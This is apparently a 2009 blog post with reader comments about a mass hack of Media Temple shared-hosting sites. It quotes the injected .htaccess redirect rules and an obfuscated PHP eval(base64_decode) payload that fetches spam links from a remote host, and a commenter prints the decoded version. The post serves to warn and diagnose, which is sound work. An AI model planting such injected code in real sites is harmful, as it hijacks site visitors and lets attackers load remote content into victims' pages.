Media Temple/WordPress hacked

Update (2009-11-16): Given the large number of Grid-Service accounts hacked in a similar fashion, but not running WordPress, I've updated the title to reflect that this appears to be a MediaTemple problem and not due to WordPress. I still don't have any definitive answers, though, and haven't seen any direct statements from either company.

While moving a WordPress site from Media Temple's Grid-Service (gs) to one of their dedicated virtual (dv) servers today, I noticed some "odd" lines in the root .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC]
RewriteRule .* [R,L]

I immediately knew that this install of WordPress had been comprised, but, prior to deleting the lines, I decided to Google them to find out more information about the problem. I found a good post by Adrian Hanft, which recommended another post by Kyle Brady.

It appears that this exploit is targeted at Media Temple's (gs) account and can also affect Drupal sites. None of the WordPress installs on my (dv) server were affected. All of them were on my (gs) account, including a domain that had Flyspray installed, but not WordPress.

All of the infected domains had the above code in the root .htaccess as well the following code in the root index.php:

<!--yje35zfv8SU--><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="">assparade</a></font>
<?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>

Some people reported that blog posts were affected and that the posts had to be manually recreated. So far, I have not detected any compromised posts or any other affected files other than .htaccess and index.php.

This exploit has affected people running up to at least version 2.85 of WordPress. Supposedly Media Temple is blaming WordPress and WordPress is blaming Media Temple. Regardless of whose fault it is, if you're running WordPress on Media Temple's Grid-Service, you should check your site out.

35 thoughts on “Media Temple/WordPress hacked

  1. My MT Grid Server account was hacked last week. My .htaccess and index.php files had the exact same changes as what you are showing here. When you decode, it points to some site in Asia.

    However, my sites are all Joomla. So, I don’t think it is a vulnerability of Joomla, Drupal or WordPress. Just a few days ago, my Media Temple FTP password was encrypted without asking them to do so. I’m beginning to suspect that they had some type intrusion.

    Thanks for posting this. You should change the title to just Media Temple Hacked.

    I have 20 websites and each was changed. This means that they most likely had full access to the root of my account.

    If it’s happening to Joomla, Drupal and WordPress sites, then my guess is Media Temple is to blame.

  2. I hate to say “me too,” but me too. Yours was one of two sites that came up when I searched for “yje35zfv8SU” so thank you for your sleuthing and your post. MT did indeed send out a notice that it was changing my passwords so the problem may lie on their end, but wordpress has had its share of troubles lately. Whatever. I’ll fix and upgrade and secure. Thanks for your post.

  3. Pingback: Tweets that mention » Blog Archive » Media Temple/WordPress hacked --

  4. me too. a client e-mailed me this morning and told me that he had seen strange porn site links in the source code of my site. i have some sites running on mediatemple’s grid service, and most of them use wordpress. updating wp to 2.8.6 alleviated the problem and removed the links, but then i saw that all hand-coded sites had the issue as well. O_O i will look into the issue further now. jeffrey, if there’s any updates on this, please post on your blog! i for sure will call mediatemple today and see if they have any idea about this thing.


  5. I can now confirm that about 80% of my sites at (mt) have been hacked. Info has been added to .htaccess AND index.html/index.php files.

  6. … and I can confirm that WP cannot be blamed, because also hand coded web sites (on domains that have no access to any WP code) have been altered.

    Enough for now. Sites clean again, gotta get some coffee. Good luck, folks!

  7. Thanks for the comments, everyone. I agree with you, Tim; it seems the incident was an FTP hack on Media Temple's end and had nothing to do with WordPress.

    I noticed the same thing, Matt. 90% of the domains/subdomains on my (gs) account were affected. Only my .htaccess and index.html/index.php files were modified, but they were hacked on both hand-coded and WordPress sites. For what I've read, hand-coded, WordPress, Joomla and ExpressionEngine sites were affected. The latter were broken outright and so easy to spot.

    Some people reported that Media Temple notified them of the intrusion via email, but I haven't received anything yet.

  8. Update: Media Temple e-mailed me with these words:

    > Unfortunately, as we are still in the process of due diligence in this security matter so we cannot share more information at this time. We need to follow security protocol to allow any vendors to publish patches and updates before we can publicly announce anything definitive. And, while I agree wholeheartedly with [name deleted --m] that one should use strong passwords at all times, I can assure you that we have not seen any evidence that the malicious content on your server was a result of a brute force attack.

    Hm hm. Time will tell, I guess.

  9. I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but none of them had wordpress installed.

    The encoded PHP evaluates to this:

    if(stripos($_SERVER['HTTP_USER_AGENT'], ‘google’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘yahoo’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘msn’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘live’))
    $r = ”;
    if($f=@fsockopen(‘′,80,$e,$er,10) and @fputs($f, “GET /linkit/in.php?domain=” . urlencode($_SERVER["SERVER_NAME"]) . “&useragent=” . urlencode($_SERVER['HTTP_USER_AGENT']) . ” HTTP/1.0rnHost:”))
    while( $l = fread($f, 1024)) $r .= $l;
    $p=strpos($r,”rnrn”); echo substr($r,$p+4);

  10. Pingback: uberVU - social comments

  11. Same thing here… GS customer with an outdated version of Drupal installed, but not in use. I received an email about suspicious FTP use. Sure enough, every one of my domains compromised.

  12. Thanks so much for this post.

    All my wordpress websites were hacked, even though I have so much “security” it’s ridiculous. Stealth Login, Login Lockout, Antivirus and Firewall plugins installed and running on all wordpress sites, plus stupid long passwords that are randomly generated with special characters, numbers and letters.

    Now today I receive an email from MT telling me of suspicious FTP activity on my account overnight, and they’ve disabled my FTP access.

    Except, they havent disabled it for ALL accounts, just one – which is USELESS.

    So Ive removed all FTP from all accounts other than my own, reset the passwords, cleaned all the wordpress installs and .htaccess files.

    I can only hope MT and WP are speaking to each other to find a solution.

  13. me too. i actually got a response from a media temple tech that intimated the all the hacks were done through my server admin account. either I’m misunderstandig and he simply means all the hacks on my (gs) were done via my server admin, or i have to really reassess their security procedures and protocols if my serveradmin account was able to hack other people’s (gs) accounts.

  14. Pingback: Media Temple, WordPress, Mass Hacking | Digging into WordPress

  15. Me too. Mediatemple did not fess up to the vulnerability but after they reset my passwords without my permission (then proceeded to have two hours of downtime so I couldn’t reset my password), I figured it had to be their problem.

    Also, when I called in, they asked me for my password, and they said OK quickly enough to let me know the support guy was looking at a plain text version of my password (he couldn’t have typed it in to check that quickly). This means they don’t store a one-way hash of the password, but the actual password. This is poor, poor security IMHO.

    I’d like a year of paid hosting or an upgrade to DV for the hassle. All my sites were affected and trying to pick through which files were affected and which were not is a royal PITA.

  16. Pingback: :: Blog

  17. Thanks for the link, Matt. It's definitely worth following and reading.

    According to Media Temple, aaron, they're "not certain this exploit is directly related to the way we were storing passwords," which do appear to be stored in plain text. But I agree with you—if the passwords were not stored as one-way hashes, it was poor security.

  18. Pingback: MediaTemple index.php Analysis –

  19. All my sites hosted with Media Temple were compromised. Both .htaccess and index.php files modified in Joomla or wordpress directories – different accounts. The interesting thing about this is that the perpetrators were able to access the admin control as well and turn on SSH and create a separate admin user. Media Temple surely got caught with their pants down due to lack of security. Who ever crashed this party surely isn’t interested in a reality show – unless their name is Kevin Mitnick.

  20. Pingback: » Blog Archive » Media Temple/WordPress hacked Medical just to Me

  21. I got a call from a client this morning saying their Drupal site was down. After finding the problem and this post the issue is exactly the same as what’s posted above.

    The scary thing is that I am on a DV server. Don’t think that this is just a GS issue.

    Just about to contact mediaTemple. I’ll post back if I find out anything extra.

  22. I think it is due to the ‘special source’ that GS uses

    I don’t think it would affect the DV in same way (but long time since I had a DV account)

    Also pixelkitty I get a warning that your site is infected with “pheonix exploit kit”. I had never heard of this before and googling it it appears to be a kit to assist in analyizing incoming traffic

    AVG is warning me about the pixelkitty site

    defo a MT GS issue not isolated to wp – it has happened a few times since also

  23. Pingback: Master of My Own Domain - It Got Me Thinking...

Leave a Reply